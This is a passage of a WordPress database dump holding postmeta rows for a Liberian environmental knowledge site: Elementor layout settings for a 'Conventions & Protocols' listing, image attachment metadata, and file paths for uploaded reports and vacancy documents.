Y\"}],\"heading_title_color\":\"#000000\",\"heading_title_typography_typography\":\"custom\",\"heading_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"post_title_typography_font_weight\":\"700\",\"post_title_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]},\"post_text_color\":\"rgba(84,89,95,0.61)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"terms_link_color\":\"#ffffff\",\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"terms_link_typography_font_weight\":\"700\",\"terms_link_text_decor\":\"underline\",\"terms_link_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"arrows_style_popover_toggle\":\"custom\",\"arrows_style_box_font_color\":\"#000000\",\"arrows_style_box_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"posts_wrapper_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"featured_post_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"posts_list_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"filter_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"hidden_item_border_active_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"featured_post_border_border\":\"solid\",\"featured_post_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"post_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"post_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"post_content_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"post_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"post_border_color\":\"rgba(122,122,122,0.48)\",\"post_text_typography_font_weight\":\"600\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(30366,4236,'_elementor_edit_mode','builder'),(30367,4236,'_elementor_template_type','wp-page'),(30368,4236,'_elementor_version','2.7.5'),(30369,4236,'_wp_page_template','default'),(30370,4236,'_elementor_data','[{\"id\":\"a61ba74\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"78ccf48\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9f48d08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0334fdc\",\"elType\":\"widget\",\"settings\":{\"block_title\":\"Conventions & Protocols\",\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"1\",\"posts_rows\":\"5\",\"image_size\":\"full\",\"excerpt_length\":15,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Learn More\",\"show_meta\":\"\",\"meta_position\":\"after-excerpt\",\"show_date_icon\":\"fa fa-check-circle\",\"show_terms_tax\":\"resource_type\",\"post_type\":\"mea_resource\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"arrow_type\":\"fa fa-angle-double-left\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"6d9f001\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"a6995f5\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"get_permalink\",\"date_format\":\"F j, Y\"}],\"heading_title_color\":\"#000000\",\"heading_title_typography_typography\":\"custom\",\"heading_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"post_title_typography_font_weight\":\"700\",\"post_title_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]},\"post_text_color\":\"rgba(84,89,95,0.61)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"terms_link_color\":\"#ffffff\",\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"terms_link_typography_font_weight\":\"700\",\"terms_link_text_decor\":\"underline\",\"terms_link_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"arrows_style_popover_toggle\":\"custom\",\"arrows_style_box_font_color\":\"#000000\",\"arrows_style_box_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"posts_wrapper_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"featured_post_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"posts_list_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"filter_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"hidden_item_border_active_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"featured_post_border_border\":\"solid\",\"featured_post_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"post_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"post_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"post_content_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"post_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"post_border_color\":\"rgba(122,122,122,0.48)\",\"post_text_typography_font_weight\":\"600\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(30371,4237,'_elementor_edit_mode','builder'),(30372,4237,'_elementor_template_type','wp-page'),(30373,4237,'_elementor_version','2.7.5'),(30374,4237,'_wp_page_template','default'),(30375,4237,'_elementor_data','[{\"id\":\"a61ba74\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"78ccf48\"}]},\"elements\":[{\"id\":\"9f48d08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0334fdc\",\"elType\":\"widget\",\"settings\":{\"block_title\":\"Conventions & Protocols\",\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"1\",\"posts_rows\":\"5\",\"image_size\":\"full\",\"excerpt_length\":15,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Learn More\",\"show_meta\":\"\",\"meta_position\":\"after-excerpt\",\"show_date_icon\":\"fa fa-check-circle\",\"show_terms_tax\":\"resource_type\",\"post_type\":\"mea_resource\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"arrow_type\":\"fa fa-angle-double-left\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"6d9f001\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"a6995f5\",\"meta_format\":\"%s\",\"meta_callback\":\"get_permalink\",\"date_format\":\"F j, Y\"}],\"heading_title_color\":\"#000000\",\"heading_title_typography_typography\":\"custom\",\"heading_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"post_title_typography_font_weight\":\"700\",\"post_title_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]},\"post_text_color\":\"rgba(84,89,95,0.61)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"terms_link_color\":\"#ffffff\",\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"terms_link_typography_font_weight\":\"700\",\"terms_link_text_decor\":\"underline\",\"terms_link_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"arrows_style_popover_toggle\":\"custom\",\"arrows_style_box_font_color\":\"#000000\",\"arrows_style_box_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"posts_wrapper_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"featured_post_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"posts_list_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"filter_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"hidden_item_border_active_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"featured_post_border_border\":\"solid\",\"featured_post_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"post_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"post_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"post_content_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"post_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"post_border_color\":\"rgba(122,122,122,0.48)\",\"post_text_typography_font_weight\":\"600\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"selected_show_date_icon\":{\"value\":\"fas fa-check-circle\",\"library\":\"fa-solid\"},\"__fa4_migrated\":{\"selected_show_date_icon\":true}},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5637a09\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"97f9083\"}]},\"elements\":[{\"id\":\"0f20919\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5d8a038\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b73161c\"}]},\"elements\":[{\"id\":\"1dd8ad2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(38590,4138,'_elementor_css','a:6:{s:4:\"time\";i:1770854777;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:12:{i:0;s:7:\"0ba5ef7\";i:1;s:7:\"c652bc2\";i:2;s:7:\"c652bc2\";i:3;s:7:\"0ba5ef7\";i:4;s:7:\"c652bc2\";i:5;s:7:\"c652bc2\";i:6;s:7:\"0ba5ef7\";i:7;s:7:\"c652bc2\";i:8;s:7:\"c652bc2\";i:9;s:7:\"0ba5ef7\";i:10;s:7:\"c652bc2\";i:11;s:7:\"c652bc2\";}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(30377,84,'_elementor_pro_version','3.7.1'),(30384,2078,'_wp_old_date','2021-08-17'),(30385,2081,'_wp_old_date','2021-08-17'),(30386,2080,'_wp_old_date','2021-08-17'),(30387,2079,'_wp_old_date','2021-08-17'),(30388,2082,'_wp_old_date','2021-08-17'),(30389,2702,'_wp_old_date','2021-08-17'),(30391,4238,'_last_editor_used_jetpack','classic-editor'),(30392,4238,'_edit_lock','1670352970:42'),(30393,4238,'_edit_last','38'),(30396,4240,'_last_editor_used_jetpack','classic-editor'),(30397,4240,'_edit_lock','1670352958:42'),(30398,4240,'_edit_last','38'),(30399,4241,'_wp_attached_file','2021/08/PFIC.png'),(30400,4241,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:503;s:6:\"height\";i:704;s:4:\"file\";s:16:\"2021/08/PFIC.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"PFIC-214x300.png\";s:5:\"width\";i:214;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"PFIC-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:16:\"PFIC-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:15:\"PFIC-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:16:\"PFIC-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:16:\"PFIC-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:16:\"PFIC-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:16:\"PFIC-503x450.png\";s:5:\"width\";i:503;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-l\";a:4:{s:4:\"file\";s:16:\"PFIC-503x650.png\";s:5:\"width\";i:503;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:16:\"PFIC-503x640.png\";s:5:\"width\";i:503;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"kava-thumb-justify-2\";a:4:{s:4:\"file\";s:16:\"PFIC-503x640.png\";s:5:\"width\";i:503;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(30401,4242,'_wp_attached_file','2021/08/D7-Final-Report_compressed.pdf'),(30405,1747,'_elementor_template_type','wp-post'),(30406,1747,'_elementor_version','3.4.1'),(30407,1747,'_elementor_pro_version','3.3.6'),(30408,1747,'_wp_page_template','default'),(30409,4243,'_elementor_controls_usage','a:0:{}'),(30410,4243,'_elementor_edit_mode','builder'),(30411,4243,'_elementor_template_type','wp-post'),(30412,4243,'_elementor_version','3.4.1'),(30413,4243,'_elementor_pro_version','3.3.6'),(30414,4243,'_wp_page_template','default'),(30415,1747,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(30420,1747,'document_cover_image','1686'),(30421,1747,'attached_document','3478'),(30434,4245,'_wp_attached_file','2021/08/CCCD-ASSESSMENT-PUBLIC-AWARENESS-OF-RIO-CONVENTIONS-IMPLEMENTATIONS.docx'),(30435,4246,'_wp_attached_file','2021/08/CCCD-THEMATIC-ASSESSMENT-NCSA.docx'),(30436,4247,'_wp_attached_file','2021/08/CCCD-PROJET-CHIEF-TECHNICAL-ADVISOR.docx'),(30437,4248,'_wp_attached_file','2021/08/CCCD-INDIVIDUAL-ASSESSMENT.docx'),(30438,4249,'_wp_attached_file','2021/08/CCCD-JINGLE-AND-PUBLIC-SERVICE-ANNOUNCEMENT.docx'),(30439,3790,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2021/08/CCCD-ASSESSMENT-PUBLIC-AWARENESS-OF-RIO-CONVENTIONS-IMPLEMENTATIONS.docx'),(30440,3790,'_wp_old_date','2021-08-03'),(30441,3791,'_wp_old_date','2021-08-03'),(30442,4253,'_wp_attached_file','2019/11/Untitled.png'),(30443,4253,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:20:\"2019/11/Untitled.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"Untitled-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"Untitled-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"Untitled-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:19:\"Untitled-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:20:\"Untitled-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:20:\"Untitled-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(30444,2297,'_wp_page_template','default'),(30445,2297,'_pods_document_cover_image','a:1:{i:0;i:4253;}'),(30446,2297,'document_cover_image','4253'),(30447,2297,'attached_document','2298'),(30452,3096,'_last_editor_used_jetpack','classic-editor'),(30453,4256,'_wp_attached_file','2020/06/wildlide.png'),(30454,4256,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:20:\"2020/06/wildlide.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"wildlide-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"wildlide-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"wildlide-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:19:\"wildlide-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:20:\"wildlide-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:20:\"wildlide-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(30455,3096,'_wp_page_template','default'),(30456,3096,'_pods_document_cover_image','a:1:{i:0;i:4256;}'),(30457,3096,'document_cover_image','4256'),(30458,3096,'attached_document','3093'),(30459,4259,'_wp_attached_file','2020/07/census.png'),(30460,4259,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:18:\"2020/07/census.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"census-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"census-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:18:\"census-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:17:\"census-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:18:\"census-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:18:\"census-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(30461,3102,'_wp_page_template','default'),(30462,3102,'_pods_document_cover_image','a:1:{i:0;i:4259;}'),(30463,3102,'document_cover_image','4259'),(30464,3102,'attached_document','3103'),(30465,3104,'_last_editor_used_jetpack','classic-editor'),(30466,4261,'_wp_attached_file','2020/07/production.png'),(30467,4261,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:22:\"2020/07/production.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"production-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"production-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"production-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:21:\"production-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:22:\"production-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:22:\"production-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(30468,3104,'_wp_page_template','default'),(30469,3104,'_pods_document_cover_image','a:1:{i:0;i:4261;}'),(30470,3104,'document_cover_image','4261'),(30471,3104,'attached_document','3105'),(30472,84,'_last_editor_used_jetpack','block-editor'),(30473,3107,'_last_editor_used_jetpack','classic-editor'),(30474,4265,'_wp_attached_file','2020/07/Untitled.png'),(30475,4265,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:20:\"2020/07/Untitled.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"Untitled-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"Untitled-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"Untitled-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:19:\"Untitled-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:20:\"Untitled-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:20:\"Untitled-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\